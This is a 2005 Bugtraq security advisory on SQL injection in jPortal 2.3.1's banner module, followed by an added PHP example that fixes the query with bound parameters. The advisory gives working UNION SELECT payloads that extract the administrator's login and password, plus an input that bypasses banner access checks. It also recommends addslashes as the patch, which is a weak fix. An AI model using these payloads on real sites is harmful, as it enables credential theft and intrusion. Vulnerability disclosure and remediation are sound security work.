Bugtraq mailing list archives
Sql injection in jPortal version 2.3.1 (module banner)
From: "Marcin \"CiNU5\" Krupowicz" <marcin.krupowicz () gmail com>
Date: Mon, 11 Apr 2005 23:28:28 +0200
Hello BugTraq,

I've found a possibility to inject SQL code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php). The bug is in these lines of code:

[code]
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";
[/code]
- line 192.

There is an unfiltered variable, $haslo. In order to patch this code just do this:

[code]
$haslo = addslashes($haslo);
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";
[/code]

[exploit]
go to http://[victim]/jportal/banner.php and try this:

' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

and then:

' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

After that, you gain the login and password of the administrator.
[/exploit]

[exploit2]
try to inject this code:

' or id='x

x - banner id

After that, you can see statistics of banners to which you haven't got passwords.
[/exploit2]

Vendor (http://jportal2.com) has been informed already.

--
Best regards,
Marcin "CiNU5" Krupowicz
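The query from line 192 written with a bound parameter, as an added example that is not part of the original post and is not jPortal code. addslashes() escapes by byte and ignores the connection character set, while a bound value never becomes part of the SQL text at all. Assumptions: PDO with an in-memory SQLite database stands in for the portal's database, and the table name `banner_a`, the function `find_banners` and the sample rows are constructed for illustration.

```php
<?php
// Added example, not jPortal code. Table layout and sample rows are constructed.
declare(strict_types=1);

// Identifiers such as $bann_a_tbl cannot be bound as parameters, so the
// table name is checked against a fixed allowlist (hypothetical name).
const BANNER_TABLES = ['banner_a'];

function find_banners(PDO $db, string $table, string $haslo): array
{
    if (!in_array($table, BANNER_TABLES, true)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    // $haslo is sent as a bound value; quotes inside it are plain data.
    $stmt = $db->prepare(
        "SELECT id, title FROM $table WHERE title = :haslo ORDER BY id DESC"
    );
    $stmt->execute([':haslo' => $haslo]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE banner_a (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO banner_a (id, title) VALUES (1, 'secret-one'), (2, 'secret-two')");

// A legitimate value matches exactly one row.
var_dump(count(find_banners($db, 'banner_a', 'secret-one')) === 1);

// The second input from the post (with x = 2) is compared as a literal
// title, so it matches no row instead of widening the WHERE clause.
var_dump(find_banners($db, 'banner_a', "' or id='2") === []);

// A table name outside the allowlist is refused before any SQL is built.
try {
    find_banners($db, 'admins', 'x');
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```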